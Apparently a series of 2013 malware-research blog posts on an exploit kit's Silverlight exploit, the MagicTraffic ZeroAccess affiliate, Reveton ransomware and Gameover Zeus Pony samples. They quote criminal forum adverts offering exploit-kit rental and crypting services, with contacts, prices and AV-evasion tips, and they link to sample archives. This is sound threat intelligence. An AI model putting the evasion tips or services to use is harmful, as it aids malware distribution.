Silverlight 5.1.10411.0 Addon In Firefox 17

Interaction is required :

Firefox Warning on Silverlight call from Angler EK
2013-11-13

If you click... Boom...

Silverlight 5.1.10411.0 - Firefox 17
Angler EK 2013-11-13

Files :
Here is a Pcap
(Courtesy of Will Metcalf from Emerging Threats).

Here is a Fiddler

Read More :
Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure Authored by Vitaliy Toropov
CVE-2013-0074 NIST
Lua Script by Emerging Threats to detect the exploitation in Suricata (can also be run from Command line)

↧

MagicTraffic : a look inside a Zaccess/Sirefef affiliate

November 17, 2013, 6:07 am

≫ Next: Reveton planting "evidences" on "the crime scene"

≪ Previous: CVE-2013-0074 (Silverlight) integrates Exploit Kits

Thx @Horgh_rce for the time spent studying different sets of samples.

There are at least 2 affiliates spreading Zaccess/Sirefef.

- MagicTraffic
- Sti Ppi

Maybe (?) a third one : SmartPrivate (?) (which could be tied to Magnitude)
But SmartPrivate and MagicTraffic binaries seems to be really similar...(subaff ?)

As all affiliate stuff you may land on it in many different ways.
Here are some (driveby focused) illustrations :

Zaccess (from MagicTraffic) pushed in Styx
2013-11-17

Zaccess (MagicTraffic one) pushed in Neutrino
2013-10-15

4 is Zaccess (MagicTraffic variant)
2nd Stage Payload of a Dropper pushed in Nuclear Pack
2013-10-16

Let's take a look at MagicTraffic.

MagicTraffic Advert

Text of the Advert :
------------------------------------------
Партнерка по кликботу MagicTraffic
Уважаемые пользователи форума [redacted], Вашему вниманию представляется новая партнерка по кликботу MagicTraffic.

Отличительные черты:
- Только кликбот и ничего более, а это означает, что на чистом траффике, без подмешивания софта, который может навредить компьютеру пользователя, бот проживет максимально долго и обогатит вас на 500-600$ с каждой слитой 1000 US инсталлов.
- Для работы, боту не требуются права Администратора, по этому отстук и активность ботов выше, чем на аналогах.
- Широкий набор фид провайдеров, гарантирующий стабильный и высокий выхлоп.
- Конвертируемые страны: US CA GB AU FR DE ES
- Еженедельные выплаты без холда на Webmoney, Epese или Wire Transfer.
- Первым тестерам повышенный рейт

Добавлю несколько немаловажных моментов. Конвертируются любые виды трафика, бот отлично подходит, как дополнение для других решений, но и сам по себе окупается с лихвой

Погрузитесь в мир волшебного конверта и сказочных заработков с MagicTraffic

Контакты:
ICQ #1: 923232
ICQ #2: 932922
Jabber: magictraffic@jabber.no (OTR приветствуется)

------------------------------------------

Translate by Google as :

------------------------------------------

Affiliate for clicbot MagicTraffic

Dear forum users [redacted], your attention is the new affiliate program on klikbotu MagicTraffic.

Distinguishing features :

- Only klikbot and nothing more , and that means that the rate of traffic on the net , without mixing software that can harm the user's computer , the bot will live as long as possible and enrich you for $ 500-600 each fusion 1000 US installs .

- To work , the bot does not require Administrator rights on this otstuk and activity bots higher than the counterparts.

- A wide range of feed providers to guarantee stable and high exhaust.

- Convertible country : US CA GB AU FR DE ES

- Weekly payments without hold on Webmoney, Epese or Wire Transfer.

- The first testers increased rtg

Add a few important point . Converted all kinds of traffic , the bot is perfect as an addition to other solutions , but also in itself pays off

Immerse yourself in a world of magic and fairy envelope with earnings MagicTraffic

Contacts:

ICQ # 1: 923232

ICQ # 2 : 932,922

Jabber: magictraffic@jabber.no (OTR welcome)

------------------------------------------

February 2013 :
------------------------------------------
С целью подогрева интереса спешу сообщить, что с 23 февраля на неделю всем будет повышен рейт на 5%

Для наших текущих и потенциальных партнеров оглашаю список стран, которые имеет смысл слать на нас.
Разделены они по уровню конверта на группы, начиная с ТОП стран, заканчивая странами с наиболее низкими бидами.
US | CA, AU, GB, NZ | DE, FR | ES, IT, SE, NL, AT, IL, CH, DK, NO | AR, BZ, ID, TH, SG, SA, AE, MY

Выплаты, как и должно быть, уходят стабильно.

По всем интересующим вас вопросам, велкам в magictraffic@jabber.no
------------------------------------------
Google Translated as :
------------------------------------------
To warm interest in a hurry to announce that on February 23 a week all will be raised by 5% rtg

For our current and potential partners announce the list of countries that it makes sense to send to us.
They are divided by the level of the envelope on the group, starting with the top countries, ending the countries with the lowest bidami.
US | CA, AU, GB, NZ | DE, FR | ES, IT, SE, NL, AT, IL, CH, DK, NO | AR, BZ, ID, TH, SG, SA, AE, MY

Payments, as it should be, go steadily.

If you have any questions, Welkom in magictraffic@jabber.no
------------------------------------------

In june 2013 added:
JP AT BE BR FI HK IE KR MX ZA

MagicTraffic - Login Screen
End of 2013

Magic Traffic 2013-11
News

Text of News :

------------------------------------------

04.10.2013

Предновогодняя акция)

Уважаемые и любимые наши партнеры) Команда MagicTraffic подготовила для вас акцию с внушительными денежными призами, которые помогут Вам красочно и незабываемо встретить новый 2014 год:)

Всем адвертам, сделавшим в период с 5.10.2013 по 24.12.2013 определенные объемы инсталлов будут начислены на баланс денежные премии, которые уйдут с выплатой 25.12.2013

Условия акции:

Сделав определенное количество инсталлов на вашем аккаунте вы имеете возможность получить единоразовый денежный бонус к вашему балансу:

25000 инсталлов + $500

50000 инсталлов + $1000

100000 инсталлов + $2000

150000 инсталлов + $5000

250000 и более инсталлов + $10000

Подсчет и начисление бонусных средств будет происходить 25.12.2013 по состоянию на 23:59:59 24.12.2013. Выплаты вашего баланса + бонусных средств будет происходить в среду 25.12.2013 в обычное время.

* Акция распространяется только на уникальные (принятые) инсталлы;

* Для получения бонуса в ваших инсталлах должно быть более 80% USA инсталлов;

* Максимальная сумма зачисления для одного аккаунта - $10000;

* Количество аккаунтов, на которые будут зачислены бонусные суммы по итогам конкурса не ограничена;

* Инсталлы должны быть качественными (средний конверт с 1к должен быть не ниже $300);

* Никаких ограничений на аккаунты на время акции накладываться не будет - конверт, отстук и прочее останется как и в обычном режиме работы партнерки.

13.09.2013

Аренда связки

Уважаемые партнеры, на правах рекламы предлагаем вам рассмотреть предложение об аренде связки:

Предлагаем Вашему вниманию связку эксплоитов Whitehole:

- всегда чистые актуальные апплеты, на текущий момент в работе CVE-2013-2465;

- свои домены, автоматически создаются и автоматически убиваются, чем защищают источники трафика от абуз;

- возможность аренды как за $ так и за %;

- средний пробив на момент написания объявления - 10%;

- бъется ие + хром и фф (но в меньшей степени чем ие).

За подробностями стучаться в жабу: whitehole@thesecure.biz

18.08.2013

Статистика

Уважаемые партнеры, как вы обратили внимание - вчера и сегодня нет или неполная статистика. Спешу заверить вас что все воостановится сегодня вечером и все суммы за предыдущие дни так же как и обычно будут дотянуты в стату.

08.08.2013

Обновление exe

Уважаемые партнеры! Не отставая от тенденций рынка, мы выпустили улучшение нашего ехе, которое касается живучести. Отныне ваши инсталлы будут жить дольше, а соответсвенно приносить вам больше дохода еще больше времени.

Всем активным партнерам просьба как можно скорее обновить ваше ехе.

03.07.2013

Крипт

Уважаемые партнеры! Для тех кто испытывает трудности с нашм криптом мы будем подбирать и советовать для Вас сторонние криптосервисы, которые могут корректно криптовать наше ехе и делать его для вас максимально чистым.

RoboService

jabber: robocrypt@theissen.org / icq: 784834

Минимальное пополнение: $100 - 6 криптов.

Круглосуточная поддержка, крипт автоматический (при наличии денег на балансе связываться с саппортом необходимости нет).

Так же присутсвуют скидки на большее количетсво критпов при единоразовом пополнении: $200 - 14 криптов / $300 - 22 крипта / $500 - 40 криптов/ $1000 - 100 криптов

ВНИМАНИЕ! В отличие от нашего крипта, мы не даем гарантий на сторонние крипты. Если для нашего крипта мы проводим полномасштабные тесты на работоспособность при каждом апдейте файла, то за сторонние крипты и их работоспособность мы не можем поручиться. По этому рекомендуем при использовании сторонних критов - смотреть на отстук и количество успешных инсталлов в нашей админке или периодически передавать нав файлы криптованные сторонними сервисами нам на тест.

PS: Если у вас нет доступов к некриптованной версии файла, обратитесь в саппорт

------------------------------------------

Translated by google as :

------------------------------------------

04.10.2013

New Year's rally )

Respected and loved by our partners ) MagicTraffic team has prepared for you to share with impressive cash prizes that will help you meet the colorful and memorable new 2014 :)

All adverts , made in the period from 05/10/2013 on 12/24/2013 installs certain amounts will be added to the balance of cash bonuses , which will go to the payment 25.12.2013

Terms and Conditions:

Having done a number of installs on your account you will have the opportunity to get one-time cash bonus to your balance :

Installs 25,000 + $ 500

Installs 50,000 + $ 1,000

Installs 100,000 + $ 2,000

Installs 150,000 + $ 5,000

250,000 or more installs + $ 10,000

Calculation and accrual of bonus money will be on 25.12.2013 at 23:59:59 24/12/2013 . Payment of your balance + bonus money will be on Wednesday 25.12.2013 at the usual time .

* Offer applies only to the unique (accepted) installs ;

* To receive the bonus in your installation has to be more than 80 % USA installs ;

* The maximum amount credited to the same account - $ 10,000;

* The number of accounts , which will be credited to the bonus amount in the competition is not limited to ;

* Installs must be of high quality ( average envelope with 1k must be no less than $ 300 ) ;

* There are no restrictions on the accounts at the time the shares will not be imposed - the envelope , otstuk etc. remain as in the normal operation of the affiliate .

13.09.2013

Rent ligament

Dear Partners , for publicity invite you to consider a proposal to lease bundles :

We offer you a bunch of exploits Whitehole:

- Always clean current applets , currently in the CVE- 2013-2465 ;

- Their domains are automatically generated and automatically killed than protect traffic sources from abuse ;

- The ability to rent as well as a $ per %

- Breaking through the middle of the writing of ads - 10%;

- Banging s + Chrome and FF ( but less than s) .

For details, knocking into a toad : whitehole@thesecure.biz

18.08.2013

statistics

Dear partners, as you have noted - yesterday and today there is no or incomplete statistics. I hasten to assure you that all voostanovitsya tonight and all amounts for the previous days, as well as usually will reach out in the article.

08.08.2013

exe update

Dear Partners Keeping up with the trends of the market, we released our improvement exe that concerns survivability. From now on, your installs will live longer, and therefore brings more income you even more time.

All active partners request as soon as possible to update your exe .

03.07.2013

crypts

Dear Partners For those who have difficulty with the crypt of our event , we will select and advise you to third-party kriptoservisy that can correctly kriptovat our exe and do it for you as clean as possible .

RoboService

jabber: robocrypt@theissen.org / icq: 784834

Minimum Deposits: $ 100 - 6 crypts .

Round the clock , automatic crypt ( if you have money on the balance sheet contact tech support is not necessary .)

Just prisutsvujut discounts for larger kolichetsvo kritpov at the completion of one-time $ 200 - 14 crypts / $ 300 - Crypt 22 / $ 500 - 40 crypts / $ 1000 - 100 crypts

WARNING ! Unlike our crypt , we do not give guarantees to third party crypt . If we spend our crypt full-scale tests on the performance for each apdeyte file, for third-party crypts and their performance we can not vouch . For this we recommend the use of third-party crits - otstuk and look at the number of successful installs in our admin or periodically transmit nav files kriptovat third-party services to us for a test .

PS: If you do not have access to nekriptovannoy version of the file , please contact our support

------------------------------------------

Note: the end of Year Rally :) (also advertised on Forums).

Note also the Advert for Whitehole.

(september, few weeks after WhiteHole came back from a 5 months "vacation")

Magic Traffic - Statistics

Was wondering if I should blur (account is now "burnt"). But I think numbers for a click bot are interesting.

It's a small account. In 5 month of activity :

2013-06-17 to 2013-11-17

XML Stats
(same kinds of Out than we could see in Podmena)

Magic Traffic - Profile

MagicTraffic - Payment

MagicTraffic - Promo

Text of Promo :

------------------------------------------

Криптованный файл Файл обновлен 3 часа(ов) назад

Полезные советы:

- Криптор полиморфный. Если ехе слишком грязное - попробуйте скачать еще раз, чтобы пропали рандомные детекты.

- Запрашивайте файл не чаще 1 раза в 15 минут.

- Не используйте публичные АВ сканнеры типа "вирустотала", есть много замечательных приватных сервисов;)

- Обновляйте файл как минимум 1 раз в день.

- Если лить много файлов с разных партнерок - профит может начать падать со всех партнерок;)

- Хороший трафик = хороший профит.

- Статистику за сегодняшний день лучше смотреть на день следующий.

- US трафик = хороший профит.

------------------------------------------

Google Translate :

------------------------------------------

Kriptovat File updated 3 hour (s ) ago

Download

Useful tips:

- Kriptor polymorphic . If the exe is too dirty - try to download it again to randomly missing detective.

- File not more than 1 time in 15 minutes.

- Do not use public AV scanners like " virustotala ," there are many wonderful private services ;)

- Update file for at least 1 time per day.

- If you pour a lot of files with different companions - profit may begin to fall on all affiliate ;)

- Good traffic = good profit .

- Statistics for the date, better to look at the next day .

- US traffic = good profit .

------------------------------------------

Files :

42 Items in a zip (Owncloud via goo.gl)

For those who would like to study this specific variation of Zaccess (MagicTraffic), here is a small Zip

(note : the ZGO one may have been repack by the team spreading it)

Content of The Zip

Read More :

Reversal of fortune: Sirefef’s registry illusion - 2013-09-19 - Malware Protection Center - Microsoft

The Wonder of Sirefef Plunder - 2013-05-20 - Malware Protection Center - Microsoft

The United States of ZeroAccess / ZeroAccess: We're Gonna Need a Bigger Planet - 2012-09-17 - FSecure

ZeroAccess: code injection chronicles - 2012-06-25 - Aleksandr Matrosov - Eset

The ZeroAccess Rootkit - James Wyke - 2012 - NakedSecurity - Sophos

↧

Reveton planting "evidences" on "the crime scene"

December 4, 2013, 3:24 am

≫ Next: One ...random...Gameover Zeus Team Pony sample Story

≪ Previous: MagicTraffic : a look inside a Zaccess/Sirefef affiliate

Fast post on last Reveton move. Thanks @MalwareSigs & @Ash4er for inputs :)

Reading Lavasoft Security Bulletin: November 2013 I saw a Ransomware design that was new to me. Lavasoft was associating it to : 908478d1f1faa539f228bbe4fcf23b6d which appears to be Reveton.

I decided to gather that Design. And end up with a slightly different one. :

Reveton - US/Fall Back Design - 2013-12-03
Blurred are Porn Images.

Going on "Unlock Instructions" you'll get :

Reveton - US/Fall Back Design - 2013-12-03

Note the NSA involvement and the Prism Logo :)

Prism Logo in a Reveton Design
2013-12-03

That variant is a little dynamic. It starts with the upper "camera square" and the "Evidences" zone empty. But a scan is in progress, and images are rotating. You'll see images that you really own being scanned.

Scan in Progress

as soon as first pornographic image is supposedly found the square is filled with the Handcuff :)
(going to unlock instruction and back to "Offender Information" you'll have the Camera)

Portable Notepad++ splash screen (was stored in MyDocuments)
after 2 porn images being found.

at the end of the scan you are being shown why you should feel guilty. (5 images).

And...guess what...those images are indeed in your computer :

%programdata%

Pictures Folder

But...there is no clever trick to really spot Pornographic images.

Reveton dll planting "Evidences" on the "Crime Scene"

The "evidences planting" does not add to the scam for sure (victim does not know about it) but the concept made me smile...

The new trick and most convincing part is your own images being showed in the scan process.

Photos of children...porn image...photos of GrandMa...other porn image... may increase conversion rate (% of victims falling to the scam)

Note that you can still land on those other Default/Us design. Am wondering if they are making some kind of study on how good design are.

Other Reveton Design for US/Default
2013-12-04

For other countries didn't spot move. Still Stitur/Urausy design (with Camera and Handcuff Image on the left - (Urausy : On the right))

----

Reveton C&C ?

Reveton Calling Home 2013-12-04

199.115.114.209

30633 | 199.115.112.0/21 | LEASEWEB-US | US | LEASEWEB.COM | LEASEWEB USA INC.

----

Files: 2 samples here

↧

One ...random...Gameover Zeus Team Pony sample Story

December 6, 2013, 9:01 pm

≫ Next: Nitmo ? No ! ... just "iBanking" used by a (the?) Neverquest/Vawtrak team

≪ Previous: Reveton planting "evidences" on "the crime scene"

Pony Icon above fragment of
Khaled Desouki Photo tied to Tharir Square events

Post to share some intel on the ~~"Moar Pony"~~ sample pointed by SpiderLabs in the "Moar Pony" FAQ.

<edit 2013-12-09>
Have been mentioned (and proved offline - Thanks Franc !) that the sample Spiderlabs is pointing too is not related to that Pony DB. It's a coincidence that it matches the scale.
--
Have fix this post accordingly
</edit>

AFAIK such a Huge Pony could be owned by only two teams.
The /Home/ Gang (Darkleech/Nymaim) or the ZGO Team (Gameover Zeus aka Zeus P2P)

(if you want to know more about those name please refer to : Paunch's arrest...The end of an Era ! )

I decided to write after reading :

FAQ: Pony Malware Payload Discovery published yesterday by SpiderLabs team.

Reply to the Hash of the Pony

Looking at names under which that sample was submitted

I figured out that I was the one who submitted it on 2013-06-06.
So I made some search and can tell you where this specific sample come from.

It belongs to the Gameover Zeus team. The one that was operating the Blackhole /Topic/ when Paunch got Arrested. In June the thread Folder was /news/ (this can be confusing cause same thread folder has been used later by another group that Conrad from Dynamoo Blog refer as ru:8080 )

Here is what I wrote in the "End of an Era post" :

"This is the blackhole with the highest number of threads. Not sure it can be operated by only one guy. Or he must be really well organised !

Distribution : Many compromised website (OT: they are also working a lot by mail attachments)

Threats : More than 60 threads. More than 2000 rotating samples a day.

The main activity is pushing Pony (different for many threads) as a loader for ZeusGameOver.

But we could see also : Medfos, MagicTraffic (PPI ClickFraud tied to Zaccess), some fakeav, even Kovter Ransomware."

That specific instance of pony was pushed in one of those thread. The one associated to the Blackhole file : abff4e31ce

You may find it in your logs (may/june at least) by looking for :
2v:2w:33:33:1j:32:1i:1g:30:32
which was the pattern for that specific file in June till Blackhole goes v2.1. Then that pattern became:
61626666346533316365
then
525357572h562g2e5456
and then
898a8e8ew98dw8w68b8d
etc....

This is the 2nd Parameter value of the Payload url...meaning if you see it...payload has been downloaded.

Illustration of 2nd Parameter value of the Payload url
For another file : f6bd835642

Note : This was a way to follow a specific threat. I love graph and would be happy to show you a Fiddler of infection by this Pony...problem is that I don't have it...cause...wget is a far easier way to grab payload than High Interaction Honey Client. Yes wget <3 Blackhole :)

I have at least 480 items of that same rotating instance of Pony.
Here is the MD5 list : http://pastebin.com/raw.php?i=VTKCDDSE
Here are the samples

Disclaimer !!
I know that many other "instances" of Pony from this group were discussing with that same CnC infra. from other threads of same Blackhole, from fake Chrome/Flash update, from mail attachments. You already read about their activity multiple time. I just filtered the one that were from the exact same rotation...

To give you an idea, from the Blackhole of that team I grabbed from April to September around : 245 000 samples.
Now you may understand if I confess that i feel almost sad looking at the picture of Paunch published by CertGIB ;)

-- Side note :
They were not using the leaked version of Pony. Coder of that loader/stealer may even be member of that team (or at least was really tied to it)

Read More :
Two million stolen passwords: How to protect yourself - 2013-12-06 - Spiderlabs

FAQ: Pony Malware Payload Discovery - 2013-12-06 - Spiderlabs
Look What I Found: Moar Pony! 2013-12-03 - Daniel Chechik and Anat (Fox) Davidi - SpiderLabs
Paunch's arrest...The end of an Era ! 2013-10-11
Case of Pony downloading ZeuS via Passworded Zip Attachment of Malvertisement Campaign 2013-06-04 Hendrik Adrian - MalwareMustDie
ZeuS-P2P monitoring and analysis - PDF - 2013-06 - CertPL
Fake Adobe Flash Updates Resurface on the Web - 2013-01-24 - Jovi Umawing - ThreatTrack
The Lifecycle of Peer-to-Peer (Gameover) ZeuS - 2012-07-23 - Brett Stone-Gross, Dell SecureWorks

↧